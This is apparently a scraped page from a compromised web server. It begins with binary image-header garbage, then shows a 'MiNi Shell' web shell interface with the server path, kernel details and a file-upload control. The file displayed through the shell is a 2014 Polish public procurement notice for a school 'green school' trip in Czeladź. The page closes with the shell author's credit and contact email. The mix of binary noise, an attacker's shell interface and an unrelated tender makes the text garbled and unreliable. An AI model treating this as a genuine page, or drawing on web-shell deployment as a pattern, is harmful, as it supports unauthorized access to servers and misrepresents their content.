JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140117/10925-N-2014.html

<p class="kh_header"><b>Czeladź: Organizacja kolonii śródrocznej tzw. zielona szkoła dla uczniów klas III
 Szkoły Podstawowej nr 7 w Czeladzi</b><br>
<b>Numer ogłoszenia: 10925 - 2014; data zamieszczenia: 17.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 7 , ul. Spacerowa 2, 41-253 Czeladź, woj. śląskie, tel. 0-32 265 35 03, faks 0-32 265 35 03.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp7.czeladz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja kolonii śródrocznej tzw. zielona szkoła dla uczniów klas III
 Szkoły Podstawowej nr 7 w Czeladzi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest organizacja kolonii śródrocznej tzw. zielonej szkoły  dla uczniów klas III Szkoły Podstawowej nr 7 w Czeladzi do miejscowości nad Morzem Bałtyckim, w tym przewóz uczniów autokarem z Czeladzi do miejsca pobytu  zielonej szkoły i z powrotem .

2.Zakres przedmiotu zamówienia obejmuje:

2.1.Przewidywalna liczba uczniów 74, w tym 2 dzieci bezpłatnie (z rodzin najuboższych)
Liczba uczestników może ulec zmianie - na podstawie rzeczywistej liczby uczestników, która będzie pochodną  zgłoszeń przez rodziców.
a)	zapewnienie bezpłatnego pobytu kadry , tj. kierownika plus jeden opiekun na piętnastu uczniów.
b)	czas trwania wypoczynku 14 dni ( łącznie z dniem wyjazdu i przyjazdu ), w tym 13 noclegów .

2.2.Podstawienie w obie strony , zgodnie z ustalonym harmonogramem , czystego , sprawnego technicznie autokaru wysokiej klasy / klimatyzacja, WC - sprawne , sprzęt DVD, spełniającego wszelkie wymogi zezwalające na przewóz dzieci:
a)	zapewnienie obsługi dwóch kierowców.
b)	zapewnienie ubezpieczenia autokaru oraz wymaganych koncesji .
c)	w przypadku awarii autokaru Wykonawca zapewnia autokar zastępczy na własny koszt.
d)	w przypadku awarii klimatyzacji koszt transportu zostanie obniżony o 10% proporcjonalnie do długości trasy.

2.3.Zapewnienie pobytu w ośrodku wypoczynkowym:
a)	obiekt oddalony maksymalnie do 1000 m od morza ;
b)	budynek wolnostojący, całoroczny, ogrzewany przez system centralnego ogrzewania, ogrodzony;
c)	zakwaterowanie w pokojach 2-4 osobowych lub typu studio ( max.5 -osobowe ) z pełnym węzłem sanitarnym w każdym pokoju, wyposażonych w łóżka jednoosobowe - nie piętrowe, szafę ubraniową, stolik , krzesełka ;
d)	 wyklucza się pawilony z wyjściem z pokoju bezpośrednio na zewnątrz budynku;
e)	umieszczenie wszystkich uczestników wyjazdu z naszej szkoły w jednym budynku na sąsiednich piętrach;
f)	wychowawcy zakwaterowani w oddzielnych pokojach;
g)	stołówka w budynku ośrodka (dopuszcza się usytuowanie stołówki na terenie obiektu );
h)	wyżywienie 4 X dziennie (śniadanie , obiad , podwieczorek, kolacja) oraz suchy prowiant na drogę powrotną i wycieczki całodniowe , zgodnie z zasadami racjonalnego żywienia określonymi w obowiązującego prawa .Posiłki mają być urozmaicone , syte , odpowiadające normom zarówno pod względem ilości , jakości jak i wartości odżywczych;
       i)   turnus rozpoczyna się od kolacji a kończy śniadaniem plus suchy prowiant na drogę powrotną ;
       j)   preferowane śniadania i kolacje w formie szwedzkiego stołu;
k)   Wykonawca zapewni uczestnikom przez cały dzień nieograniczony dostęp do napojów i pieczywa z   
      dżemem .
      l)    zapewnienie ogrzewania budynku w przypadku niskich temperatur.
m)  pomoc przy wnoszeniu i wynoszeniu bagaży .
n)   opieka rezydenta z ramienia biura

2.4.Zorganizowanie:
a)	dwóch całodziennych wycieczek autokarowych z przewodnikiem i opłaconymi biletami wstępu   
      do zwiedzanych obiektów ( min.2 obiekty  w trakcie każdej z nich ) .
b)	ogniska z pieczeniem kiełbasek .

2.5.Wymagania dotyczące zaplecza edukacyjno-sportowego:
a)	co najmniej jedna świetlica , sala ( pomieszczenie odrębne niż jadalnia ) z możliwością zorganizowania dyskotek , konkursów .
b)	zapewnienia jednego pomieszczenia  ( sali ) wyposażonej w tablicę , stoliki i krzesła do prowadzenia zajęć dydaktycznych  , mieszczącego około 30 uczniów .
c)	możliwość nieodpłatnego korzystania ze sprzętu TV i DVD
d)	 zorganizowania co najmniej czterech dyskotek w turnusie .
e)	obiekt powinien posiadać boisko sportowe , plac zabaw  a  Wykonawca zapewnić możliwość korzystania z bazy rekreacyjno - sportowej ośrodka .
f)	zapewnienie drobnych nagród i dyplomów dla każdego uczestnika.

2.6.Zapewnienie opieki medycznej:
a)	pielęgniarka z dyspozycyjnością 24 h na dobę na terenie ośrodka ( w przypadku dziecka  
      umieszczonego w izolatce opiekę nad nim zapewnia pielęgniarka );
b)	zapewnienie w koniecznych przypadkach opieki lekarskiej w ramach ubezpieczenia  
      zdrowotnego , polegającej na wezwaniu lekarza do obiektu lub niezwłocznym dowiezieniu   
      uczestnika zielonej szkoły do punktu opieki medycznej ( przychodnia lub szpital ) bezpłatnym  
      transportem;
c)	Wykonawca zapewnia zaopatrzenie w podstawowe leki i środki opatrunkowe .

2.7.Pozostałe warunki zamówienia:
a)	Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo i opiekę nad dziećmi w czasie podróży , jak i pobytu , w ramach kosztów ujętych w oferowanej cenie ;
b)	Wykonawca ponosi pełną odpowiedzialność za warunki BHP i  P/poż. na obiekcie ;
     c)    Zamawiający wymaga , aby przez cały okres obowiązywania umowy Wykonawca posiadał ważną   
           polisę ubezpieczeniową lub inny dokument potwierdzający ,że jest ubezpieczony od
           odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem
           zamówienia na sumę ubezpieczenia nie mniejszą niż kwota brutto złożonej oferty;
     d)   Wykonawca przed podpisaniem umowy złoży polisę ubezpieczeniową lub inny dokument  
           potwierdzający że jest ubezpieczony od odpowiedzialności cywilnej   w zakresie prowadzonej  
          działalności na kwotę brutto złożonej oferty ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4, 63.51.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art.22ust.1ustawy Pzp.
Warunek ten zostanie spełniony , jeżeli Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności , jeżeli przepisy prawa nakładają obowiązek ich posiadania .
Zamawiający nie opisuje szczegółowych warunków w tym zakresie .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art.22ust1 ustawy Pzp. oraz wykazu  wykonanych usług.
Warunek ten zostanie spełniony , jeżeli Wykonawca wykaże , że w ciągu  ostatnich 3 lat przed upływem terminu składania ofert , a  jeżeli okres  prowadzenia działalności jest krótszy - w  tym okresie , wykonał co najmniej 2 usługi organizacji zielonej szkoły lub innej formy wypoczynku dla dzieci i młodzieży (kolonie letnie , kolonie zimowe , obozy ), o wartości brutto  nie mniejszej niż  60 000,00 zł. każda wraz z dowodami, iż te usługi zostały wykonane należycie ( poświadczenie , referencje ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu  określonych w art.22ust1 ustawy Pzp.oraz opisu obiektu,w którym będą zakwaterowani uczestnicy zielonej szkoły.
Warunek ten zostanie spełniony , jeżeli Wykonawca wykaże , że dysponuje obiektem: spełniającym wymagania ogólne opisane w Charakterystyce przedmiotu zamówienia  w ppkt.2.3 do 2.6 .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu  określonych w art.22ust1.ustawy Pzp. oraz wykazu osób , które będą uczestniczyć w wykonaniu zamówienia , w szczególności odpowiedzialnych za świadczenie usługi, w raz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami . 
Warunek ten będzie spełniony, jeżeli Wykonawca wykaże, że dysponuje lub  będzie dysponował osobami, które będą uczestniczyć w wykonaniu zamówienia: rezydent z ramienia biura oraz  pielęgniarka z dyspozycyjnością 24 h na dobę na terenie ośrodka.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art.22ust.1 ustawy Pzp .
Warunek zostanie spełniony, jeżeli Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Zamawiający nie wyznacza szczególnych warunków w tym zakresie  .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Metodą spełnia - nie spełnia na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art.22ust1 ustawy Pzp. oraz wykazu  wykonanych usług.
Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w ciągu  ostatnich 3 lat przed upływem terminu składania ofert, a  jeżeli okres  prowadzenia działalności jest krótszy - w  tym okresie , wykonał co najmniej 2 usługi organizacji zielonej szkoły lub innej formy wypoczynku dla dzieci i młodzieży (kolonie letnie , kolonie zimowe , obozy ), o wartości brutto  nie mniejszej niż  60 000,00 zł. każda wraz z dowodami ,  iż te usługi zostały wykonane należycie ( poświadczenie, referencje).;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz oferty; 
2. Pisemne zobowiązania podmiotów oddających Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia , jeżeli Wykonawca polega na wiedzy i doświadczeniu , potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów; 
3.Pełnomocnictwo , określające jego zakres w przypadku , gdy Wykonawcę reprezentuje pełnomocnik; 
4.Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Wykonawców występujących wspólnie w przypadku wspólnego ubiegania się o udzielenie zamówienia.
Przed podpisaniem umowy Wykonawca powinien przedstawić dokumenty :

1.W przypadku wybrania oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia , Zamawiający zażąda przed podpisaniem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców (art.23 ust.4 Ustawy.)
2.Wykonawca przed podpisaniem umowy złoży polisę ubezpieczeniową lub inny dokument  
potwierdzający że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  
działalności na kwotę brutto złożonej oferty .</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie wykonawcy - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy :
1)	w sytuacji następstwa prawnego wynikającego z odrębnych przepisów,
2)	zmiany wysokości stawek podatku VAT , jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych ,
3)	zmiany terminu wykonania zamówienia (+/ -7 dni ), jeżeli dochowanie terminu określonego w umowie jest niemożliwe z uwagi na siłę wyższą lub inne okoliczności niezależnie od stron lub których strony umowy przy zachowaniu należnej staranności nie były w stanie uniknąć lub przewidzieć.
Dokonanie zmiany umowy w zakresie w/w wymaga uprzedniego złożenia na piśmie wniosku Wykonawcy wskazującego zasadności wprowadzenia zmian i zgody Zamawiającego na jej dokonanie lub przedłożenia propozycji zmiany przez Zamawiającego.
Zmiany umowy wymagają - pod rygorem nieważności - zachowania formy pisanej w postaci aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp7.czeladz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa nr 7 
im.1000-lecia Państwa Polskiego w Czeladzi ul. Spacerowa 2    
41-253 Czeladź
woj. śląskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2014 godzina 11:30, miejsce: Sekretariat:
Szkoła Podstawowa nr 7 
im.1000-lecia Państwa Polskiego w Czeladzi ul. Spacerowa 2    
41-253 Czeladź 
woj. śląskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com